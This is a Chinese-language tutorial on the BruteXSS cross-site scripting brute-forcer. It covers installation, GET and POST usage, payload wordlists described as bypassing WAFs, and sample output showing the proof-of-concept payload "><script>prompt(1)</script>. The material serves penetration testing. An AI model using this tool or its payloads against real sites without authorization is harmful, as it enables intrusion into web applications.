0x00 前言
相信很多小伙伴都知道XSS測試,至於如何更加有效地插入載荷是一件重復性的高強度勞動工作,在此本文介紹了一款自動進行插入XSS,並且可以自定義攻擊載荷。這些載荷從幾十條到幾百條甚至幾千條。該腳本也同時包含了一些繞過各種WAF的語句。
0x01 BruteXSS
BruteXSS是一個非常強大和快速的跨站點腳本暴力注入。它用於暴力注入一個參數。該BruteXSS從指定的詞庫加載多種有效載荷進行注入並且使用指定的載荷和掃描檢查這些參數很容易受到XSS漏洞。得益於非常強大的掃描功能。在執行任務時, BruteXSS是非常准確而且極少誤報。 BruteXSS支持POST和GET請求,適應現代Web應用程序。特點:XSS暴力破解XSS掃描支持GET/ POST請求自定義單詞可以包含人性化的UI
0x02 下載與安裝
github地址:https://github.com/ym2011/penetration/tree/master/BruteXSS安裝小提示:1 腳本需要以下條件方可正常執行:Python 2.7 #在運行python 2.7的平台上,如Windows , Linux 或者其他設備Modules required: Colorama, Mechanize #所需模塊,請參考以下方式安裝root@kali:~/Desktop/BruteXSS# pip install coloramaroot@kali:~/Desktop/BruteXSS# pip install Mechanize
0x03 實際使用
安裝成功後,我們可以執行以下語句:root@kali:~/Desktop/BruteXSS# python brutexss.py -h#在目錄 BruteXSS 下,有wordlist.txt wordlist-small.txt wordlist-medium.txt wordlist-huge.txt四個攻擊載荷wordlist.txt # 約20條常用語句,可以執行一個基本簡單的XSS檢查wordlist-small.txt #約100條語句,可以執行一個相對全面的XSS檢查wordlist-medium.txt #約200條語句,可以執行一個繞過WAF的XSS檢查wordlist-huge.tx #約5000條語句,可以執行一個非常全面的並且繞過WAF的XSS檢查1 GET 方法COMMAND: python brutexss.pyMETHOD: gURL: http://www.site.com/?parameter=valueWORDLIST: wordlist.txt2 POST方法COMMAND: python brutexss.pyMETHOD: pURL: http://www.site.com/file.phpPOST DATA: parameter=value¶meter1=value1WORDLIST: wordlist.txt3 結果輸出
[code] ____ _ __ ______ ____
| __ ) _ __ _ _| |_ ___ \ \/ / ___/ ___|
| _ \| '__| | | | __/ _ \ \ /\___ \___ \
| |_) | | | |_| | || __/ / \ ___) |__) |
|____/|_| \__,_|\__\___| /_/\_\____/____/
BruteXSS - Cross-Site Scripting BruteForcer
Author: Shawar Khan -https://shawarkhan.com
Select method: [G]ET or [P]OST (G/P): p
[?] Enter URL:
[?] >http://site.com/file.php [+] Checking if site.com is available...
[+] site.com is available! Good!
[?] Enter post data: > parameter=value¶meter1=value1
[?] Enter location of Wordlist (Press Enter to use default wordlist.txt)
[?] > wordlist.txt
[+] Using Default wordlist...
[+] Loading Payloads from specified wordlist...
[+] 25 Payloads loaded...
[+] Injecting Payloads...
[+] Testing 'parameter' parameter...
[+] 2 / 25 payloads injected...
[!] XSS Vulnerability Found!
[!] Parameter: parameter
[!] Payload: "><script>prompt(1)</script>
[+] Testing 'parameter1' parameter...
[+] 25 / 25 payloads injected...
[+] 'parameter1' parameter not vulnerable.
[+] 1 Parameter is vulnerable to XSS.
+----+--------------+----------------+
| Id | Parameters | Status |
+----+--------------+----------------+
| 0 | parameter | Vulnerable |
+----+--------------+----------------+
| 1 | parameter1 | Not Vulnerable |
+----+--------------+----------------+
以下是運行使用結果截圖:(哈哈,安全維基小廣告 https://www.sec-wiki.com/ ***^^___^^*****)
歡迎大家分享更好的思路,熱切期待^^_^^ !